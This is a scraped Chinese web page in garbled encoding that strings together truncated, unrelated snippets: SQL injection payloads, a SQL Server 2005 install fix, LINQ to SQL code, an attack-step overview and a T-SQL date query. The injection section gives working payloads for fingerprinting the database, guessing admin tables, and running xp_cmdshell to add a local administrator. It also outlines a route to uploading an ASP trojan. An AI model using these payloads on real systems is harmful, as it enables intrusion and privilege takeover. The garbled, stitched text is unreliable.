ÅжÏÊý¾Ý¿âÀàÐÍ
(select count(*) fromsysobjects)>0 //sqlÊý¾Ý¿â
(select count(*) from msysobjects)>0 //accessÊý¾Ý¿â
µÃµ½SqlÓû§Ãû
user>0
Conversion failed when converting the nvarchar value 'dbo' to data type int.
ÖØ¹¹SQLÓï¾ä
ÕûÊýÐÍ
(A) ID=49 ID=49 And [ ²éѯÌõ¼þ] £¬¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where ×Ö¶Î=49 And [ ²éѯÌõ¼þ]
×Ö·ûÐÍ
(B) Class= Á¬Ðø¾ç
×¢ÈëµÄ²ÎÊýΪClass= Á¬Ðø¾ç’ and [ ²éѯÌõ¼þ] and ‘’= ’ £¬
(C)like ’% ¹Ø¼ü×Ö% ’
keyword= ’ and [ ²éѯÌõ¼þ] and ‘%25 ’= ’£¬
²Â±íÃû
And (Select Count(*) from Admin)>=0
²Â³¤¶È
and (select top 1 len(username) from Admin)>0
н¨Óû§Ãû
exec master..xp_cmdshell "net user name password /add"--
master..xp_cmdshell "net localgroup administrators name /add"--
db_name()>0 Ç°ÃæÓиöÀàËÆµÄÀý×Óand user>0 £¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name() ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£
backup database Êý¾Ý¿âÃû to disk= ’c:\inetpub\ ......
ÔÚ°²×°SQL Server 2005¿ª·¢°æÊ±³öÏÖÎÊÌâ¡£°²×°»·¾³Îªwindows xp sp3£¬°²×°Óû§Ê¹Ó󬼶¹ÜÀíÔ±£¨Administrator£©¡£³öÏֵĴíÎóÊÇ
ÔÚ°²×°“Integration Services”²½Öèʱ³öÏÖ°²×°´íÎó£¬Ìáʾ“´íÎó: -2146233087”¡£
´íÎó¼Ç¼
±êÌâ:
Microsoft SQL Server 2005 °²×°³ÌÐò
ÎÞ·¨ÔÚ COM+ Ŀ¼Öа²×°ºÍÅäÖóÌÐò¼¯
C:“Program Files“Microsoft SQL
Server“90“DTS“Tasks“Microsoft.SqlServer.MSMQTask.dll¡£´íÎó: -2146233087
´í
ÎóÏûÏ¢: Unknown error 0x80131501
´íÎó˵Ã÷: ÒªÖ´ÐдËÈÎÎñ£¬Äú±ØÐë¾ßÓйÜÀíÆ¾¾Ý¡£ÇëÓëÄúµÄϵͳ¹ÜÀíÔ±ÁªÏµÒÔ»ñµÃ°ïÖú¡£
½â¾ö°ì·¨£º
Ò»£®MSDTCÔËÐÐÕÊ»§ÎÊÌâ
È·ÈÏMSDTC ·þÎñÕýÔÚÔËÐУ¬²¢ÇÒÆäÆô¶¯ÕÊ»§ÊÇNT AUTHORITY“Network
Service”¡£°´ÕÕÒÔϲ½ÖèÀ´¼ì²é£º
1. “¿ªÊ¼”-“ÔËÐД-services.msc
2.
ÔÚ·þÎñÁбíÖÐÕÒµ½Distributed Transaction Coordinator£¬Ë«»÷ÒÔÆäÊôÐÔ
3.
ÔÚÊôÐÔ´°¿ÚÇл»ÖÁµÇ¼ѡÏ£¬È·ÈÏÆäÆô¶¯ÕʺÅΪ”NT AUTHORITY“Network Service”
4.
Æô¶¯DTC·þÎñÔÙ³¢ÊÔ°²×°SQL Server 2005
½á¹û£ºÕâ¸ö²½ÖèÎÒÒѾ ......
Ò»¸ö¼òµ¥µÄÀý×Ó£º
ÏȽ¨Ò»¸öC#Àࣺ
ÒýÓÃSystem.Data.Linq.dll³ÌÐò¼¯£¬
using System.Data.Linq.MappingºÍ
using System.Data.Linq Á½¸ö¿Õ¼ä¡£
[Table]
public class Inventory
{
[Column]
public string Make;
[Column]
public string Color;
[Column]
public string PetName;
//Ö¸Ã÷Ö÷¼ü¡£
[Column(IsPrimaryKey = true)]
public int CarID;
public override string ToString()
{
return string.Format(
"±àºÅ={0};ÖÆÔìÉÌ={1};ÑÕÉ«={2};°®³Æ={3}",
CarID,Make.Trim(),Color.Trim(),PetName.Trim());
}
}
ÓëSQL(express°æ)Êý¾Ý¿â½»»¥:
class Program
{
const string cnStr=
@"Data Source=(local)\SQLEXPRESS;Initial Catalog=Autolot;"+
......
ÔÚVisual Studio 2008 ÖÐʹÓÃO/RÉè¼ÆÆ÷£º
µãÌí¼ÓÏîÄ¿£¬Ñ¡Ôñ´´½¨Linq to SQLÏîÄ¿£¬Ê¹Ó÷þÎñÆ÷×ÊÔ´¹ÜÀíÆ÷Á¬½ÓNorthwindÊý¾Ý¿â£¬½«CustomersºÍOrdersÁ½¸ö±íÍϵ½Éè¼Æ½çÃæÉÏ£¬ÏµÍ³»á×Ô¶¯´´½¨app.configºÍNorthwid.designer.cs,ǰÕßÊÇÅäÖÃÁ¬½ÓÊý¾Ý¿âµÄÁ¬½Ó×Ö´®£»ºóÕß»áÉú³ÉÒ»¸ö¼Ì³Ð×ÔDataContextµÄÀࣺNorthwindDataContext¡£
ʹÓÃlinqµ÷³öÊý¾Ý£º
static void Main(string[] args)
{
NorthwindDataContext dc= new NorthwindDataContext();
dc.Log=Console.Out;
var query=from c in dc.Customers
join o in dc.Orders on c.CustomerID equals o.CustomerID
orderby c.CustomerID
select new {
c.CustomeriD,c.CompanyName,c.Country,o.OrderID,o.OrderDate};
foreach(var item in query)
& ......
SQL×¢Èë¹¥»÷
¡¡¡¡SQL×¢Èë¹¥»÷ÊǺڿͶÔÊý¾Ý¿â½øÐй¥»÷µÄ³£ÓÃÊÖ¶ÎÖ®Ò»¡£Ëæ×ÅB/SģʽӦÓÿª·¢µÄ·¢Õ¹£¬Ê¹ÓÃÕâÖÖģʽ±àдӦÓóÌÐòµÄ³ÌÐòÔ±Ò²Ô½À´Ô½¶à¡£µ«ÊÇÓÉÓÚ³ÌÐòÔ±µÄˮƽ¼°¾ÑéÒ²²Î²î²»Æë£¬Ï൱´óÒ»²¿·Ö³ÌÐòÔ±ÔÚ±àд´úÂëµÄʱºò£¬Ã»ÓжÔÓû§ÊäÈëÊý¾ÝµÄºÏ·¨ÐÔ½øÐÐÅжϣ¬Ê¹Ó¦ÓóÌÐò´æÔÚ°²È«Òþ»¼¡£Óû§¿ÉÒÔÌá½»Ò»¶ÎÊý¾Ý¿â²éѯ´úÂ룬¸ù¾Ý³ÌÐò·µ»ØµÄ½á¹û£¬»ñµÃijЩËûÏëµÃÖªµÄÊý¾Ý£¬Õâ¾ÍÊÇËùνµÄSQL Injection£¬¼´SQL×¢Èë¡£SQL×¢ÈëÊÇ´ÓÕý³£µÄWWW¶Ë¿Ú·ÃÎÊ£¬¶øÇÒ±íÃæ¿´ÆðÀ´¸úÒ»°ãµÄWebÒ³Ãæ·ÃÎÊÃ»Ê²Ã´Çø±ð£¬ËùÒÔĿǰÊÐÃæµÄ·À»ðǽ¶¼²»»á¶ÔSQL×¢Èë·¢³ö¾¯±¨£¬Èç¹û¹ÜÀíԱû²é¿´IISÈÕÖ¾µÄϰ¹ß£¬¿ÉÄܱ»ÈëÇֺܳ¤Ê±¼ä¶¼²»»á·¢¾õ¡£µ«ÊÇ£¬SQL×¢ÈëµÄÊÖ·¨Ï൱Áé»î£¬ÔÚ×¢ÈëµÄʱºò»áÅöµ½ºÜ¶àÒâÍâµÄÇé¿ö£¬ÐèÒª¹¹ÔìÇÉÃîµÄSQLÓï¾ä£¬´Ó¶ø³É¹¦»ñÈ¡ÏëÒªµÄÊý¾Ý¡£
¡¡¡¡SQL×¢Èë¹¥»÷µÄ×ÜÌå˼·
¡¡¡¡··¢ÏÖSQL×¢ÈëλÖã»
¡¡¡¡·ÅжϺǫ́Êý¾Ý¿âÀàÐÍ£»
¡¡¡¡·È·¶¨XP_CMDSHELL¿ÉÖ´ÐÐÇé¿ö
¡¡¡¡··¢ÏÖWEBÐéÄâĿ¼
¡¡¡¡·ÉÏ´«ASPľÂí£»
¡¡¡¡·µÃµ½¹ÜÀíԱȨÏÞ£»
¡¡¡¡SQL×¢Èë¹¥»÷µÄ²½Öè
¡¡¡¡Ò»¡¢SQL×¢Èë©¶´µÄÅжÏ
¡¡¡¡Ò»°ãÀ´Ëµ£¬SQL×¢ÈëÒ»°ã´æÔÚÓÚÐÎÈ磺HTTP://xxx.xxx.xxx ......
--1.¹ØÓÚwhereɸѡÆ÷ÖгöÏÖÖ¸¶¨ÐÇÆÚ¼¸µÄÇó½â
SQL code
--»·¾³
create table test_1
(
id int,
value varchar(10),
t_time datetime
)
insert test_1
select 1,'a','2009-04-19' union
select 2,'b','2009-04-20' union
select 3,'c','2009-04-21' union
select 4,'d','2009-04-22' union
select 5,'e','2009-04-23' union
select 6,'f','2009-04-24' union
select 7,'g','2009-04-25'
go
ÎÒÃÇÒ»°ãͨ¹ý datepart(weekday )½øÐÐÇó½â£¬±ÈÈçÇó½âÐÇÆÚ2µÄ¼Ç¼
select * from test_1
where DATEPART(WEEKDAY,t_time+@@DATEFIRST-1)=2
/*
id value t_time
----------- ---------- -----------------------
3 c 2009-04-21 00:00:00.000
*/
ÕâÀïÉæ¼°µ½ @@datefirst Õâ¸öϵͳ±äÁ¿£¬Ò»°ãÎÒÃÇÓÃÀ´µ÷½Ú²»Í¬µØ·½µÄÈÕÆÚϰ¹ß¡£
Èç¹ûÄã¾õµÃ¹ØÓÚÕâ¸ö±äÁ¿ºÜÄÑÒ²ÀÁµÃÈ¥ÒÀÀµËüµ÷½Ú£¬ÕâÀﻹÓÐÒ»ÖÖ·½·¨
Äã¿ÉÒÔʹÓÃÒ»¸ö²ÎÕÕÈÕÆÚ,ͨ¹ýÏàͬÐÇÆÚÊý³É7µÄ±¶ÊýµÄÔÀí½øÐвéѯ
select * from test_1
where DATEDIFF(DAY,'1900-01-02',t_time)%7=0
/*
id value t_time
----------- ---------- ------- ......